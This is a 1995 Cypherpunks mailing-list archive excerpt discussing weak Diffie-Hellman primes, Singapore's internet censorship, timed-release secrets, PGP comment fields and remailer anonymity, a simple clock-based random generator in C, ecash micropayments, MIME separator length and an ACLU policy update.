> as default because it is faster than the others, and the state
> department will pressure them to do so. Then we are again left with
> too weak protections (in other words, pseudo-security which makes
> people believe they have protection, when they actually don't).

> After the precomputation, it is apparently cheap enough to crack the
> exchange that it can be done on a mass scale to all exchanges
> between a very large number of hosts. I find this very harmful, as
> it again provides no protection against mass surveillance. We are
> already too close to an Orwellian society.

The remarks there apply equally well to organized criminals, large corporations, and hostile governments.

Or, suppose some group manages to get access to enough idle time, computes the database, and posts it on the Internet. I for one would be willing to contribute CPU time on machines where I have access to help such a group, because I think it is better that it is widely known and publicized when there is little security and privacy.

Including the provision for the 512 bit prime is *HARMFUL* and *DANGEROUS*.

Export control is not really an issue here, because if companies in the United States cannot provide secure networking, there are other companies in the world that can.
Tatu Ylonen From nobody at REPLAY.COM Wed Nov 8 16:38:43 1995 From: nobody at REPLAY.COM (Anonymous) Date: Thu, 9 Nov 1995 08:38:43 +0800 Subject: Cybercensor in Singapore Message-ID: <199511081715.SAA19894@utopia.hacktic.nl> NY Times, November 8, 1995, Editorial Cyberspace in Singapore. The Internet Threat to Official Censorship "The Internet is like fire," Mr. Yeo said. "If you don't learn how to control it, it will burn you." In Singapore, a little democracy can be a dangerous thing. Singapore. From his 37th-floor office overlooking Singapore Strait, George Yeo can survey the oil refineries and bustling dockyards that helped make Singapore the trade and financial center of Southeast Asia. But the view that interests the Minister of Information and the Arts these days is not the vista beyond his window. It is the image on the computer terminal at his desk. Mr. Yeo, like the rest of Singapore's top politicians, wants his country to be a leader in the manufacture and use of computer technology without relinquishing the Government's chokehold on the dissemination of information in Singapore. Singapore's effort to find a balance point will be closely watched by other Asian countries that mix capitalist economics with authoritarian politics. The difficulty was underlined last week. Even as Mr. Yeo worried about the perils of the Internet, the Government announced it was relocating 500 industrial enterprises to make room for the development of advanced electronics manufacturing plants. Contradictions like that abound in Singapore, a country that eludes simple classification. With its gleaming skyscrapers and shopping arcades, it can seem like Dallas transplanted to the South China Sea. Conversely, the dominance of one political party and the presence of a paternalistic Government can make it feel like a remnant of the Soviet bloc. 
Salman Rushdie's "Satanic Verses" and Cosmopolitan magazine are banned, yet the city's largest bookstore stocks a selection of contemporary literature and the works of Chee Soon Juan, Singapore's opposition leader. Singapore's gaudy prosperity challenges the American faith that individual liberty is essential for a vital marketplace. George Yeo is the personification of that challenge. Born in Singapore in 1954, educated at Cambridge University and Harvard Business School, he is disdainful of the cacophony and untidiness of American democracy. Like Lee Kuan Yew, the architect and ruler of modern Singapore, he believes the vulnerabilities of his ethnically divcrse city-state can be best handled by a strong government that encourages a sense of community and limits individual rights. But controlling semiconductors is not the same as controlling newspapers, television networks or political opponents. With the aggressive use of libel and slander statutes Singapore's leaders have intimidated the newspapers that publish here, including The International Herald Tribune. To control television broadcasting, the Government has banned household use of satellite dishes. Some political pluralism is permitted, but no one doubts the primacy of Mr. Lee's People's Action Party. Recognizing the risk of bottling up public demand for foreign television broadcasts, Singapore's leaders are wiring the country for cable television. That way viewers will receive many more channels, including MTV, while the Government will still be able to screen out programming it finds objectionable. It is the quintessential Singapore solution. Singapore's approach to controlling cyberspace is equally ingenious, but harder to enforce. Mr. Yeo, essentially, hopes to control the Internet by embracing it. He is encouraging use of the Internet by equipping schools with computers, and establishing systems that allow Singaporeans to link up with the computer network by dialing a local phone number. 
The catch is that the Government will be able to monitor use of the Internet that goes through local servers, and is already intervening to block material it considers pornographic. The Government has blunted an uncensored Internet forum on Singapore political life by assembling a group of users who make sure the Government's views are represented.

Mr. Yeo concedes that more sophisticated and affluent users can outflank many of his defenses by dialing into the Internet through foreign phone systems. His purpose, he says, is to lay down markers for citizens, expecting that most will abide by them.

"The Internet is like fire," he said. "If you don't learn how to control it, it will burn you." In Singapore, a little democracy can be a dangerous thing.

Philip Taubman

-----

From tcmay at got.net Wed Nov 8 16:42:22 1995
From: tcmay at got.net (Timothy C. May)
Date: Thu, 9 Nov 1995 08:42:22 +0800
Subject: expiration dates on cryptography
Message-ID:

At 12:21 PM 11/8/95, John Curtis wrote:

>The discussion between Mr. May and Mr. Shields concerning
>time-release cryptography raised an interesting question in my
>mind.
>
>Given that trust is often of an ephemeral nature, it would be
>quite useful to set time limits on secrets. Would it be possible
>to cryptographically protect a secret such that it could not be
>decrypted after a certain time?

An interesting twist.

There are two broad things to consider:

1. Cryptography, what can mathematically be done.

2. Economics and social systems, what "business ecologies" can do.

Pure cryptography is about #1, with minimal consideration of #2. Much of what interests me involves #2.

How this relates to your interesting question goes as follows. Even the "timed-release cryptography" is NOT a pure cryptographic system, as the idea of "temporal state" in crypto is iffy. That is, clocks can be jiggered. Even "sealed clocks" can be jiggered.
But just as Haber and Stornetta's "digital timestamps" use time, such a thing is possible once _economic agents_ enter the picture. And once economic considerations are used.

The "timed-release crypto" system depends for its security on the likelihood that N agents holding pieces of something--something they don't know the value of--will likely hold those pieces for as long as they are being paid. (If you want to discuss why this is likely, even in a world of mistrust and malice, we can discuss it.)

"Self-destruct crypto" would work roughly the same way:

-- N agents holding pieces of puzzle, contracted to destroy those pieces on such-and-such date. It is likely that some or even all of them would comply, if properly paid.

Caveats:

1. Sure, they could make backups. Probably do. But just as archival files are shredded, a system for eliminating "expired" files would be possible.

2. Sure, they could cheat. Ditto for "timed-release crypto." (Time is symmetric for this problem.)

3. Again, the security of the system to a large extent depends on the N agents not knowing what the pieces are part of, nor knowing who the other holders are. They never know whether a given piece is part of an audit, a test, etc.

4. There is a slight asymmetry, despite what I said, in that one can "test" agents to see if they'll release their pieces as contractually obligated to, but one can never be sure that agents have actually destroyed their pieces.

5. Still, distributing a secret amongst, say, 30 agents and having them "agree" to destroy their pieces on January 20, 2002, seems pretty likely to result in the collective secret (n-out-of-m pieces) being recoverable after that date.

Such a system would need more consideration of backup strategies, etc. (If everyone is carefully backing up and the backup tapes are somewhere, then quite clearly the secret would not be gone; hence the issue of backup strategies.)
>I suspect that the laws of thermodynamics might prohibit this
>in classical cryptography because as a message expired the
>amount of entropy would decrease. Quantum cryptography
>might work, but that will be science fiction for some time to
>come.

I'm always interested in the links between information theory, algorithmic complexity, and notions of entropy, but I am skeptical in the extreme that the "laws of thermodynamics" have anything to do with whether one can throw away bits.

If I make a list on my computer, and then erase it, have I violated a "law of thermodynamics"? Of course not.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From stewarts at ix.netcom.com Wed Nov 8 16:42:49 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Thu, 9 Nov 1995 08:42:49 +0800
Subject: expiration dates on cryptography
Message-ID: <199511082002.MAA25560@ix4.ix.netcom.com>

[ Hmmm, maybe I'd better get this message out quickly, before it expires... :-]

At 07:21 AM 11/8/95 -0500, John Curtis wrote:
>The discussion between Mr. May and Mr. Shields concerning
>time-release cryptography raised an interesting question in my
>mind.
>
>Given that trust is often of an ephemeral nature, it would be
>quite useful to set time limits on secrets. Would it be possible
>to cryptographically protect a secret such that it could not be
>decrypted after a certain time?

Decryption is equivalent to knowing a secret plus doing some work.
There are two ways to make information available/unavailable - by depending on calculations from known data, or by having people agree to publish/delete it. The former method is trustable, but doesn't have time built in to it - either you know stuff or you don't. The latter method is harder to trust - you can build contractual mechanisms to encourage people to keep their commitments, and use crypto methods like splitting shared secrets to limit the impact of some of them not keeping them - but it's basically not cryptographic.

Getting people to keep information secret for a while and then publish is possible; that's within their control. Getting people to keep information public, and then delete all the copies they own is possible, but if the information is _public_, anybody in the world could have a copy - deleting it requires finding them all, and getting them all to agree to delete it. That's _much_ harder.

You could build a system where an escrow agent keeps a piece of information private, but available upon request, and deletes it on a certain date. That lets you know that _if_ nobody's asked for the information by then, and the agent has done its job, that nobody else will be able to decrypt it. Again, you can secret-share among multiple agents to decrease the impact of defaults (either failure-to-delete or failure-to-deliver.) A related approach is for the agent to provide a service of decrypting data encrypted with the agent's public key, and agreeing only to decrypt data before or after some date specified in the message.

Another technique you can use is for the agent to keep the data until paid for delivery; the retrieval token includes a digital check with an expiration date. In this case, you're trusting the bank to not honor the check after its expiration date, and the escrow agent not to deliver the data without getting paid. For this service, you want checks rather than cash - if the check goes stale, the money is still in your account.
#-- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281 From patl at catfish.lcs.mit.edu Wed Nov 8 16:43:27 1995 From: patl at catfish.lcs.mit.edu (Patrick J. LoPresti) Date: Thu, 9 Nov 1995 08:43:27 +0800 Subject: PGP Comment feature weakens remailer security Message-ID: <199511082151.QAA05650@catfish.lcs.mit.edu> -----BEGIN PGP SIGNED MESSAGE----- bill.stewart> So, for safety, either turn off PGP comments before bill.stewart> using it with remailers, or wipe out the comments by bill.stewart> hand before each layer of encryption (easy to do with bill.stewart> GUI-based systems like Private Idaho; I don't know if bill.stewart> premail lets you do this or not.) Incidentally, Mailcrypt's remailer support strips the comment field after each encryption, and has done so since version 3.2. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface iQCVAwUBMKEmVHr7ES8bepftAQEPSgP9FJYeKUSZKyFN/VWIwLjKIaDVzPtzyqHR tbj1UqbDl1trrKCoV6uud5qfK/FQwqQylnv1YsYNIVPPav66ImUvgSaXUMvZJBvC 8vinQI66s3M1PBJ8VIaLuVtay826JDazGHEexHpDLwNVGLdJq0RrNLVr2H9oLA8g 5aE9MHVfAcM= =MdHQ -----END PGP SIGNATURE----- From raph at CS.Berkeley.EDU Wed Nov 8 16:44:18 1995 From: raph at CS.Berkeley.EDU (Raph Levien) Date: Thu, 9 Nov 1995 08:44:18 +0800 Subject: PGP Comment feature weakens remailer security In-Reply-To: <199511080454.UAA05765@jobe.shell.portal.com> Message-ID: <199511081943.LAA24863@kiwi.cs.berkeley.edu> Point well taken. I'm seriously considering completely disabling the PGP comment feature when invoked from premail. In fact, that's what the new code does right now. On an unrelated topic... cypherpunks like to count bits, right? What is the correct number of pseudorandom bits to use in a MIME multipart separator? If the data has a line which matches the separator, the message is corrupted. 
Of course, if you can take multiple passes through the data, you can simply verify that it does not contain a line which matches the separator. But if you're restricted to a single pass, then the only way to do it is to use a randomly generated separator. I figure that 128 bits should _definitely_ be enough (that's what is in the new premail code now). Even 64 bits should ensure that it is unlikely that anyone will ever experience message corruption over the expected lifetime of premail. However, it makes me nervous. What do people think? Raph From netsurf at pixi.com Wed Nov 8 16:54:31 1995 From: netsurf at pixi.com (NetSurfer) Date: Thu, 9 Nov 1995 08:54:31 +0800 Subject: PGP Comment feature weakens remailer security In-Reply-To: <199511080454.UAA05765@jobe.shell.portal.com> Message-ID: On Tue, 7 Nov 1995 anonymous-remailer at shell.portal.com wrote: > to protect the privacy of communications. PGP can bite you. > The PGP comment feature lets you stick one (or more?) lines of comment > into your encrypted messages, after the Version: line but before the > encrypted message body. If you use the PGP comment feature to say something ---- 8< snip > > -----BEGIN PGP SIGNATURE----- > Version: 2.7.1 > Comment: PGP available outside U.S.A. at ftp.ox.ac.uk > You are using Viacrypt PGP, which has a release out which fixes the comment "feature" - contact them for an upgrade. This was fixed in the freeware version some time ago as well. -NetSurfer #include >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> == = = |James D. Wilson |V.PGP 2.7: 512/E12FCD 1994/03/17 > " " o " |P. O. 
Box 15432 | finger for full PGP key > " " / \ " |Honolulu, HI 96830 |====================================> \" "/ G \" |Serendipitous Solutions| http://www.pixi.com/~netsurf > >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> From jya at pipeline.com Wed Nov 8 17:00:27 1995 From: jya at pipeline.com (John Young) Date: Thu, 9 Nov 1995 09:00:27 +0800 Subject: DUF_ibf Message-ID: <199511081552.KAA06338@pipe3.nyc.pipeline.com> Pal has provided a gopher-FBI paper: "Computer Crime Categories: How Techno-criminals Operate." By David L. Carter, a professor in the School of Criminal Justice, Michigan State University Types of Computer Crimes Computer As the Target Computer As the Instrumentality of the Crime Computer Is Incidental to Other Crimes Crimes Associated With the Prevalence of Computers Perspective on Legal Issues Special Problems with Computer-Related Crime Intellectual Property Malfeasance by Computer International Issues Conclusion Criminals have adapted the advancements of computer technology to further their own illegal activities. Unfortunately, their actions have far out-paced the ability of police to respond effectively. DUF_ibf (21 kb in two parts) From anonymous-remailer at shell.portal.com Wed Nov 8 17:13:43 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Thu, 9 Nov 1995 09:13:43 +0800 Subject: DejaNews all over again Message-ID: <199511082306.PAA24448@jobe.shell.portal.com> On Wed, 8 Nov 1995, Perry E. Metzger wrote: > anonymous-remailer at shell.portal.com writes: > > I wish that Detweiler could (seriously) go back to wherever he came from. > > What a fascinating statement to make, considering that you are > probably Detweiler. Fascinating. First, I'm accused of being noted computer viral expert, Dr. Frederick B. 
Cohen, (simply because he agrees with my assessment of the critical algorithm flaw in Netscape Navigator) and now I'm accused of perhaps being at the other end of the spectrum. Of being Detweiler, simply because he can take my signature and identity by signing an email, as Alice de 'nonymous or simply accusing me of posting in his "style".

I see that the character assassination sport continues, and I am now targeted. Hunter become hunted. I wonder why?? And why, by of all people, Perry?

Is it perhaps because, I speak the truth, and the truth makes people very, very nervous. Is it because the flaw which is in the Navigator product is woven into the code fabric, and can't be *fixed*.

After all, Netscape (and AT&T) have had, over THREE WEEKS to work on this problem or to make some form of public comment, and have done nothing, but put some of their programmers -- unofficially ... speaking for myself ... not speaking for the Company -- programmers on this list.

Meanwhile people are having their PGP keyrings collected, their passwords monitored, and all of the information -- even information which they have NOT posted to Usenet, information that is simply on their personal hard drives, or on a private corporate network that is behind a firewall -- collected by anyone who actually understands *how* to use Netscape Navigator's standard features to do it.

And so the question is: Why am I having my character assassinated while this threat continues?? And while the loss and damage continues. Why are Netscape and AT&T not mitigating the damage?

Is it because what I say is simple common sense stripped of the veneer of "technical language" and jargon?? And can't be *commented* on or *fixed*. Is this the fear which any truth teller faces, not only on the Internet, but in any forum where they try to challenge Goliath.

Maybe, that's one reason to post anonymously.

To clear the record definitively, I am neither Detweiler nor Dr. Frederick B. Cohen, and I am not the issue.
I am simply myself, and I will _reveal_ my identity to the international public once the timing is appropriate. If anyone wants to know who I am, they can contact the PR department of AT&T or Netscape and ask. (Their address can be requested from either postmaster at att.com or postmaster at netscape.com, respectively.) Both companies have an email address for me, and would _likely_ *cough* forward any email enquiries to me without any editing. That way, everything is done clearly and out in the open. Nothing hidden, and nothing private, and none of my comments will become "their sole property to be used in their sole discretion". Neither company can accuse me of attacking them with daggers in the dark of night, from behind a shield of anonymity, when I advocate public open disclosure and commentary. Alice de 'nonymous ... ...just another one of those... P.S. This post is in the public domain. C. S. U. M. O. C. L. U. N. E. From frank at funcom.no Wed Nov 8 17:14:16 1995 From: frank at funcom.no (Frank Andrew Stevenson) Date: Thu, 9 Nov 1995 09:14:16 +0800 Subject: True Random (short c-source) Message-ID: I have written a short random number generator which appears to produce reasonable random numbers even in DOS, at the heart of the code is the short function fGetRand, the amount of entropy derived from this function varies from >1 to >>6 depending on system load, I haven't made any effort to whiten it at all. I am not making any claims about its usefulness. I am only trying to demonstrate the ease at which good random number may be obtained. Any comments and analysis will be mostly welcome, the source is hereby placed in the public domain: I have used WATCOM10 to compile and test under DOS/WIN95, where clock is running at 18hz. I have also tested on IRIX with impressive results. 
--- START ----
#include <stdio.h>
#include <stdlib.h>
#include <time.h>

int fGetRand (void);

int main (void)
{
  long vCount;
  FILE *out;
  int byte = 0;                 /* bit accumulator; must start from a known value */
  int tick;

  out=fopen("random.bin","wb");
  if(out==NULL)
  {
    printf("cant write to file random.bin\n");
    exit(1);
  }
  for(vCount=1;vCount<=512;vCount++)
  {
    tick=fGetRand()&0x01;       /* keep only the low bit of the spin count */
    byte=byte+byte+tick;        /* shift the new bit into the accumulator */
    if((vCount & 0x7)==0)
      fputc((char)byte,out);    /* every 8th bit: write the packed byte */
    fputc((char)tick,out);      /* the raw bit is also written as its own byte */
  }
  fclose(out);
  return 0;
}

/* Count how many loop iterations fit before clock() advances to its next tick. */
int fGetRand (void)
{
  int count = 0;                /* must start from zero for the count to mean anything */
  clock_t tick;

  tick=clock();
  while(tick==clock())
    count++;
  return (count);
}
----- END -----

PGP encrypted mail preferred, finger for key.
The above views are ONLY endorsed by BoggleMind Inc. (not to be confused with MindBoggle Ltd.)

From hfinney at shell.portal.com Wed Nov 8 17:35:07 1995
From: hfinney at shell.portal.com (Hal)
Date: Thu, 9 Nov 1995 09:35:07 +0800
Subject: ecash speed
Message-ID: <199511082345.PAA02628@jobe.shell.portal.com>

A few days ago I got my ecash account set up with the Mark Twain bank. Presently only one merchant is officially listed at , Delorie Software. As I understand it, only people with merchant accounts are eligible to be listed here. However, you don't have to have a merchant account to receive ecash or to set up shop software. If anyone else has set up a shop to receive Mark Twain ecash using a user account, perhaps they could post here and we could keep a list of unofficial vendors.

The other thing I wanted to write about is ecash speed. One idea people have had is to use ecash for micropayments, such as one cent to read a web page. The question is, is the current ecash software sufficiently fast for this? Maybe someone could set up a site using either Twain ecash or DigiCash ecash which actually charged you a penny for each page you browsed around. It would be interesting to see how much of an obstacle it presents in browsing the web. The impression I've had from the few times I've used ecash is that in fact it does slow things down way too much for this to be practical. But it would be good to actually do the experiment.
One reason I was thinking about this is reading a new paper by Rivest and Shamir, . It is about a couple of proposed systems for micropayments, specifically oriented towards the penny-per-web-page model. They are offline systems, designed so that a minimum of calculation is done by the vendor, user and bank. So they should be very efficient.

However, the big problem is that they are not anonymous. The cash tokens are recognizable by the bank when spent tokens are sent in by the vendors - the bank knows who spent them. Maybe for penny level transactions that is not a big deal, although if for-pay web browsing becomes common then it does seem like it would present a privacy threat. Every web site you visit (not the specific pages, but the overall site names) would be known by the bank - quite a significant piece of marketing data.

The point is that if the anonymity afforded by ecash is too costly in terms of time, then we may end up stuck with a non-anonymous system simply because that is the only one efficient enough to work. It would be good to find out if that is a serious problem.

Hal Finney

From loki at obscura.com Wed Nov 8 17:52:24 1995
From: loki at obscura.com (Lance Cottrell)
Date: Thu, 9 Nov 1995 09:52:24 +0800
Subject: PGP Comment feature weakens remailer security
In-Reply-To: <199511081943.LAA24863@kiwi.cs.berkeley.edu>
Message-ID:

I think you are fine if the odds of corrupting the message are less than the odds of getting hit by a falling meteor while running the program. In general there is little point in making any one part of the system many orders of magnitude more reliable than any other part.

-Lance

On Wed, 8 Nov 1995, Raph Levien wrote:

> Point well taken.
>
> I'm seriously considering completely disabling the PGP comment
> feature when invoked from premail. In fact, that's what the new code
> does right now.
>
> On an unrelated topic... cypherpunks like to count bits, right?
> What is the correct number of pseudorandom bits to use in a MIME
> multipart separator? If the data has a line which matches the
> separator, the message is corrupted. Of course, if you can take
> multiple passes through the data, you can simply verify that it does
> not contain a line which matches the separator. But if you're
> restricted to a single pass, then the only way to do it is to use a
> randomly generated separator.
> I figure that 128 bits should _definitely_ be enough (that's what
> is in the new premail code now). Even 64 bits should ensure that it is
> unlikely that anyone will ever experience message corruption over the
> expected lifetime of premail. However, it makes me nervous. What do
> people think?
>
> Raph
>

----------------------------------------------------------
Lance Cottrell   loki at obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra. Suddenly
it flips over, pinning you underneath. At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------

From anonymous-remailer at shell.portal.com Wed Nov 8 17:56:45 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Thu, 9 Nov 1995 09:56:45 +0800
Subject: PGP Comment feature weakens remailer security
Message-ID: <199511090020.QAA12479@jobe.shell.portal.com>

On Wed, 8 Nov 1995, Raph Levien wrote:

> On an unrelated topic... cypherpunks like to count bits, right?

Mmmm, sometimes we do ... Sometimes we even think, if I were a lil wa'bbit, where would I go hide ... especially when we do a bad Elmer Fudd impression of Bugs Bunny.

> What is the correct number of pseudorandom bits to use in a MIME
> multipart separator? If the data has a line which matches the
> separator, the message is corrupted. Of course, if you can take
> multiple passes through the data, you can simply verify that it does
> not contain a line which matches the separator. But if you're
> restricted to a single pass, then the only way to do it is to use a
> randomly generated separator.

An interesting problem.

If you are going to take multiple passes, and do top-down and bottom up analysis, then you can't really parse on the fly. It pretty much has to be a batch job, I think. You have to get your data, and then check it. You can't simply *trust* that there is not any corruption, and pass all of your data through.

And if you're going to parse in a single pass, then we're back to the problem of monkeys sitting at typewriters and Shakespeare's sonnets.

> I figure that 128 bits should _definitely_ be enough (that's what
> is in the new premail code now). Even 64 bits should ensure that it is
> unlikely that anyone will ever experience message corruption over the
> expected lifetime of premail. However, it makes me nervous. What do
> people think?

Unfortunately, it's not quite that simple. The likelihood of corruption is not based on each past run. It's just like rolling dice. The odds of rolling boxcars is 1 in 36 (I think) no matter how many prior times, you've rolled boxcars. Twenty passes doesn't influence whether you crap out or not on a single roll.

Nothing *remembers* past performance to ensure that something doesn't happen (or happens) many, many times in a row.

I guess, this is why Atlantic City, Baden Baden, and Las Vegas generally do as well as they do.

Alice de 'nonymous ...

...just another one of those...

P.S. This post is in the public domain.
C. S. U. M. O. C. L. U. N. E.
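
[Added example, not part of any message in this archive and not premail's code: the separator question from this thread, worked in Python. It shows a single-pass writer corrupting a message when a fixed separator appears in the data, the multi-pass check, and a union bound on the collision chance for 64 and 128 random bits. All function names, the "=_" prefix and the sample parts are assumptions made for the illustration; the bound assumes the data was chosen independently of the separator.]

```python
"""Random MIME multipart separators: collision bound, single-pass writer,
and the multi-pass check. Added illustration; all names are hypothetical."""
import secrets
from fractions import Fraction


def make_boundary(bits=128):
    """Return a separator carrying `bits` random bits from the OS CSPRNG."""
    if bits <= 0 or bits % 8:
        raise ValueError("bits must be a positive multiple of 8")
    return "=_" + secrets.token_hex(bits // 8)


def collision_bound(bits, total_lines):
    """Union bound on P(a random `bits`-bit separator equals one of
    `total_lines` data lines), for data chosen independently of the
    separator. Summing the lines of every message ever sent bounds the
    lifetime risk, since each message draws a fresh separator."""
    return Fraction(total_lines, 2 ** bits)


def collides(boundary, parts):
    """Multi-pass check: True if any body line could be taken for a
    delimiter. Conservative: flags any line starting with '--boundary'."""
    delim = "--" + boundary
    return any(line.startswith(delim)
               for part in parts for line in part.splitlines())


def build_multipart(parts, boundary):
    """Single-pass writer: emits each part without inspecting its lines."""
    out = []
    for part in parts:
        out.append("--" + boundary)      # delimiter line opens the part
        out.append("")                   # blank line ends the (empty) headers
        out.extend(part.splitlines())
    out.append("--" + boundary + "--")   # closing delimiter
    return "\n".join(out) + "\n"


def _body(lines):
    """Part headers end at the first blank line; the rest is the body."""
    if "" in lines:
        return "\n".join(lines[lines.index("") + 1:])
    return ""


def split_multipart(message, boundary):
    """Minimal reader: split on delimiter lines, stop at the closing one."""
    delim = "--" + boundary
    close = delim + "--"
    parts, current = [], None
    for line in message.splitlines():
        stripped = line.rstrip()
        if stripped == delim or stripped == close:
            if current is not None:
                parts.append(_body(current))
            if stripped == close:
                break
            current = []
        elif current is not None:
            current.append(line)
    return parts


def build_checked(parts, bits=128):
    """Multi-pass writer: redraw the separator until the check passes."""
    while True:
        boundary = make_boundary(bits)
        if not collides(boundary, parts):
            return boundary, build_multipart(parts, boundary)


# Constructed sample data: the second part contains a line equal to the
# delimiter that the fixed separator "sep" produces.
SAMPLE_PARTS = ["first part\nline two", "quoted mail:\n--sep\nmore text"]

if __name__ == "__main__":
    broken = split_multipart(build_multipart(SAMPLE_PARTS, "sep"), "sep")
    print("fixed separator gives:", broken)
    boundary, msg = build_checked(SAMPLE_PARTS)
    print("random separator round-trips:",
          split_multipart(msg, boundary) == SAMPLE_PARTS)
    for bits in (64, 128):
        print(bits, "bits, 2**40 lines:",
              float(collision_bound(bits, 2 ** 40)))
```
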
From gnu at toad.com Wed Nov 8 18:16:55 1995 From: gnu at toad.com (John Gilmore) Date: Thu, 9 Nov 1995 10:16:55 +0800 Subject: "Industry Group Rebuffs U.S. on Encryption" (NYT 8Nov95, C3) Message-ID: <9511090050.AA01828@toad.com> A group of 37 companies and trade and privacy associations sent a letter to Al Gore yesterday, complaining about Clipper-II and crypto export controls, and promising to send their own policy proposals to Congress and the Administration within six months. It's a short story. I'll leave the exact text to John Young :-). I've heard that there's a better story in the Washington Post today, too. I expect we'll see the letter itself within a day or two. John Gilmore From adam at lighthouse.homeport.org Wed Nov 8 18:30:41 1995 From: adam at lighthouse.homeport.org (Adam Shostack) Date: Thu, 9 Nov 1995 10:30:41 +0800 Subject: True Random (short c-source) In-Reply-To: Message-ID: <199511090111.UAA07637@homeport.org> Frank Andrew Stevenson wrote: | I have written a short random number generator which appears to produce | reasonable random numbers even in DOS, at the heart of the code is the | short function fGetRand, the amount of entropy derived from this What tests have you done on the output that causes you to say the random numbers are 'reasonable'? Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From Alan.Pugh at internetMCI.COM Wed Nov 8 18:31:08 1995 From: Alan.Pugh at internetMCI.COM (amp) Date: Thu, 9 Nov 1995 10:31:08 +0800 Subject: using pgp to make an otp Message-ID: <01HXEVB6V1QQ91YN41@MAIL-CLUSTER.PCY.MCI.NET> -- [ From: amp * EMC.Ver #2.3 ] -- -----BEGIN PGP SIGNED MESSAGE----- From: John Curtis \ Internet: (jbell at capecod.net) To: amp \ Internet: (alan.pugh at internetmci.com) Subject: RE: using pgp to make an otp JC> I was confused and answered a question you didn't ask. I guess you JC> can use PGP to generate a set of pseudorandom numbers. 
I'm not sure JC> that this would be different from using the IDEA cypher (the JC> underlying PGP cypher) to generate random numbers. I am also not JC> convinced that this would be quicker or cheaper than any number of JC> other mechanisms. JC> If I really wanted a true one-time pad, I'm inclined to explore the JC> thermal noise of a zener diode. isn't the noise generated by such a diode more accurately described as chaotic rather than random? i would think that there might be potential problems with using chaos as a random number source. it might be somewhat less random than you may think as most chaotic system's 'noise' operates within definable parameters. (like a lorenz system). i _would_ think that it would act as a most excellent prng, but exactly how _truely_ random it actually would be i couldn't say. while it may not be _truely_ random, it would most likely be cryptographically secure though. i think generating _true_ randomness is pretty difficult without measuring something similar to radioactive decay. the system that i proposed setting up is, admittedly, a p-otp at best. i'm much more convinced of this than i was when i initially proposed it. the comments i've gotten on it were most enlightening. amp <0003701548 at mcimail.com> (since 10/31/88) PGP Key = 57957C9D PGP FP = FA 02 84 7D 82 57 78 E4 E2 1C 7B 88 62 A6 F9 F7 November 9, 1995 11:41 -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBMKIvRIdTfgZXlXydAQG0zAf/Y0qX8X6mFa932Egm0PdBZr4RCBHqPccx 5Nb5KZi1jQPRFnoAoEgU6Z6P+SLWCGhZisn1UxvlD2eX6HbbPB/B0mHReoWw/qp2 hI7rWCn+JtSwUvxeno88zFmZ/AreAukm8LNi/PdJp+5lunDgclrOWoR5BklglqT8 iE2nxd6dhbUEKUYXzsN6yEXDRl/tUDiriEVev2YhttTZuyUg9krMa32VtyxyUCeB UfhidSjgwkNkSO3QQaHVHUCby8NHQJPRdKR4ym8tDfFjNXxieUQKwxi8r/0ofo5g 1UxtBwJICd+/LxOZovtKGYDqHJc4vPRqdY7x4VbTff0FM4i4W0ZpUQ== =6ty1 -----END PGP SIGNATURE----- From perry at piermont.com Wed Nov 8 18:42:30 1995 From: perry at piermont.com (Perry E. 
Metzger) Date: Thu, 9 Nov 1995 10:42:30 +0800 Subject: ecash speed In-Reply-To: <199511082345.PAA02628@jobe.shell.portal.com> Message-ID: <199511090130.UAA13562@jekyll.piermont.com> Hal writes: > The point is that if the anonymity afforded by ecash is too costly in > terms of time, then we may end up stuck with a non-anonymous system > simply because that is the only one efficient enough to work. It would > be good to find out if that is a serious problem. I suspect that as CPU speed exponentiates this will become less and less of a problem. It doesn't especially worry me. Perry From ACLUNATL at aol.com Wed Nov 8 18:42:47 1995 From: ACLUNATL at aol.com (ACLUNATL at aol.com) Date: Thu, 9 Nov 1995 10:42:47 +0800 Subject: ACLU Cyber-Liberties Update: Nov. 8, 1995 Message-ID: <951108171518_82372328@mail04.mail.aol.com> ----------------------------------------------------------------- November 8, 1995 ACLU CYBER-LIBERTIES UPDATE A bi-weekly e-zine on cyber-liberties cases and controversies at the state and federal level. ----------------------------------------------------------------- IN THIS ISSUE: * ACLU Statement and ACTION ALERT on Federal Wiretap Bill * ACTION ALERT on Federal Online Indecency Legislation * State Utility Commissions Consider Online Access and Privacy Issues * News on Electronic Access to Public Information in Washington State * John Perry Barlow Launches Cyberspace Lecture Series Co-Sponsored by the ACLU of Washington * ACLU Student Chapter President at Georgetown University Law Center Writes About Marty Rimm Controversy * Conferences * Online Resources from the ACLU National Office and State Affiliates ----------------------------------------------------------------- FEDERAL PAGE (Congress/Agency/Court Cases) ----------------------------------------------------------------- * ACLU Statement and ACTION ALERT on Federal Wiretap Bill Last week, the ACLU emphatically urged the FBI to withdraw its proposal for greatly increased wiretapping powers. 
"Given the government's own statements on the usefulness of wiretaps, we can only guess at the FBI's motives," said Laura W. Murphy, Director of the ACLU's National Washington Office. "But if Congress were to allow this system to go into place, we'd have a national surveillance apparatus that would pale in comparison to the infamous security state of the former Soviet Union."

"This proposal," Murphy added, "would make the KGB look like privacy advocates."

